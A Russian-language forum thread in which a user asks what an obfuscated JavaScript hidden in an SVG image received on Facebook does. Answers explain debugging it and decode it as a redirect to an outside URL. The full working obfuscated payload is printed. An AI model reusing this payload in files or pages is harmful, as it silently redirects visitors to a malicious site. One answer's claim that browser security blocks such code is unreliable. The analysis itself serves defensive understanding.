Поможете разобать вирусный скрипт,который спрятан в SVG картинке?

Question

[pmozil]

Получил на Facebook сообщение с прикрепленной картинкой "photo1323.svg" .
Скачал я,значит, это изображение и думаю,что может знать данный адресат об языке разметки масштабируемой векторнoй графики.И тут я припоминаю,что SVG поддерживает JavaScript,с помощью которого делается анимация.
Я открыл его в блокноте и не разобрал ни одну функцию и не один параметр,как будто он был как-то сгенерирован,а не написан человеком.
Вот сам скрипт

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function vuoelw(buegk, npydu, qcpfy) {
for (var coicer = "RNc0gAnrjv:T.fB29yEad6C=zJ1VUHblu_/PohGYOSL4mX7I3iZeFs?tp85KDkMx", yfckcd = ["rFgU_p5MvhOb=JuozHiSxYm4kE8j1.36l7cDaLey9ns0V:TRfINtXZ\/K2PAd?CGB","mOL?_1HSVZeB7rNyYpR39ghb0C\/DcuEiX8:6f=s.G4JxIdPoTjUta5lkKnAMF2vz","GN3EmAoHVfMLFUT06v\/27aB9cugZPxJdKhr5SI1:Y?tz4ln8kRCbD.j_y=espXOi",":B7eDtUHjbCY1ILTM\/2PmhSuNc_lxJO4E.GosFdy0ag83k5zRp?rnv69VifZ=KAX",".0hbvERV6kyHS8_zlX=GBmtMZ5c?NYO9\/4LJFUon7spr3CiKeDagTdfj1P2Au:Ix"], whsht = "", xrjrt = 0; yfckcd[xrjrt];) xrjrt++;
for (var gkvyro = 0; buegk[gkvyro];) {
	for (var gnjnvt = 0, gnntty = -1; coicer[gnjnvt];) {
		if (coicer[gnjnvt] == buegk[gkvyro]) {
			gnntty = gnjnvt;
			break
		}
		gnjnvt++
	}
	if (gnntty >= 0) {
		for (var qcucm = 0, awducq = -1; yfckcd[gkvyro % xrjrt][qcucm];) {
			if (yfckcd[gkvyro % xrjrt][qcucm] == buegk[gkvyro]) {
				awducq = qcucm;
				break
			}
			qcucm++
		}
		whsht += coicer[awducq]
	} else whsht += buegk[gkvyro];
	gkvyro++
}
var hswos = "";
for (nfegz = npydu; nfegz < whsht.length; nfegz++) hswos += whsht[nfegz];
return whsht = hswos
}

  var ofqwly = window;
  var lmktar = vuoelw("kwfIjaK",4,true);
  var nzbeu = vuoelw("qjiq9aL29DaH",4,true);
  var ndgexl = vuoelw("JqmD85KbmRLfSwUMtU",14,true);
  ofqwly[lmktar][nzbeu][ndgexl] = vuoelw("2IcVUKkyCLcpRUdtwb1/Z:dshSkRsR=KIV",4,false);
  ]]></script>
</svg>

Сообственно вопрос:
Что делает данный скрипт?

Answer 1

[Петр]

Вытащите скрипт, вставьте его в пустую страницу или jsfiddle.net в Chrome
Добавьте в первую строкуdebugger;
Откройте консоль разработчика и выполните покомандно. Станет ясно как это работает.
Политика безопасности браузера не позволит выполниться тому коду, что не безопасен.

Comments

[pmozil]

Можно подробнее?Я не совсем понял.
Когда вставляю в jsfiddle.net то пишет Input plain JavaScript code, no HTML.
Создал файл *.html вставил туда скрипт,вставил в начало функции "debugger;".
Запустил файл *.html. Открылся хром и происходит редирект за редиректом на разные страницы.
Что я не так делаю?
Как выполнить покомандно?
Спасибо!

[pmozil]

Никита Полевой: Никита Полевой: вот именно,это я уже понял;)
Помогите разобратся с ответом Петра.

[Kovalsky]

pmozil:

1. На jsfiddle в блок JS первой строкой вписываете debugger;, затем копируете скрипт из вашего кода, только скрипт, начиная со слова function, заканчивая последней точкой с запятой,
2. Открываете консоль, F12,
3. Запускаете скрипт, либо нажав Enter в любом из блоков редактирования jsfiddle, либо нажав кнопку Run,
4. Начинает выполняться скрипт, появляется темный фон, на котором видно элементы управления дебаггера - кнопки Resume script execution и Step over next function call,
5. Во вкладке Sources показан выполняющийся скрипт. В нем выделены активная строка и выполняющаяся инструкция. Нажимаете Step over next function call, по ходу лицезреете к чему это приводит, какие возвращаются результаты, они отображаются правее,

[pmozil]

Никита Полевой: Спасибо большое!

Answer 2

[Kovalsky]

Вот что он делает

window.top.location.href = 'http://yinsewe.us/location.php';

Функция осуществляет какое-то сложное декодирование, я не стал тратить время на разбор. Всякие даэдрические lmktar, nzbeu и ndgexl хранят в себе ключи top, location и href соответственно